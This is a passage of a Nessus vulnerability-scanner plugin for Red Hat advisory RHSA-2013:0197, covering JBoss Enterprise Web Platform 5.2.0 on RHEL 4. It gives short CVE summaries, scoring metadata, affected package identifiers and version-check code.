Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. 
(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. 
If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0197\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0197\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"google-guice-2.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-javadoc-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-javadoc-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"javassist-3.12.0-6.SP1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-core-2.2.21-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 
reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", 